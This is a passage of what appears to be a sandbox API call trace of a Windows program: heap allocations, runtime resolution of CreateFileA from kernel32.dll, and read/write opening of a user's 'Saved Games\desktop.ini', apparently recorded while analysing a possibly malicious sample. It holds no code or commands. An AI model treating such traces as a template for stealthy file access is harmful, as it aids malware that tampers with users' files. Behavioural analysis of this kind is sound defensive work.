dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0041.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0041.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0041.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0041.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0041.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0041.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0041.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0041.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0041.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0041.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0041.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0041.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0041.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0041.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0041.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0041.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0041.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0041.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.663] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0041.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0041.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889a90 [0041.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889a90, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0041.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0041.663] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0041.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0041.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0041.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0041.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a90 [0041.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889a90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0041.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0041.664] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0041.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0041.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0041.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0041.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0041.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0041.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0041.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x36) returned 0x7c2080 [0041.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini", cchWideChar=54, lpMultiByteStr=0x7c2080, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini", lpUsedDefaultChar=0x0) returned 54 [0041.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0041.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0041.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.665] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0041.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0041.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0041.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0041.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0041.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0041.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0041.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0041.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0041.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0041.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0041.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0041.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0041.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0041.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=54, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0041.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6c) returned 0x7db378 [0041.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=54, lpWideCharStr=0x7db378, cchWideChar=54 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned 54 [0041.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0041.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0041.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0041.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0041.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0041.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0041.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0041.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0041.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0041.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0041.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0041.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0041.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0041.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0041.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0041.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0041.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0041.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0041.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0041.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0041.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0041.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0041.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0041.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0041.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0041.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0041.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0041.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0041.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0041.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0041.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0041.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0041.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0041.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0041.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0041.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0041.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0041.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0041.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0041.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0041.668] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0041.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0041.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0041.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0041.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0041.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0041.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0041.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0041.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0041.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0041.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0041.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0041.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.669] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0041.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0041.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0041.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0041.669] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0041.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0041.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0041.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0041.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0041.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0041.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0041.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0041.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0041.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0041.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0041.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0041.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0041.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0041.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0041.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0041.670] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0041.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0041.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0041.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0041.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0041.670] HeapFree (in: 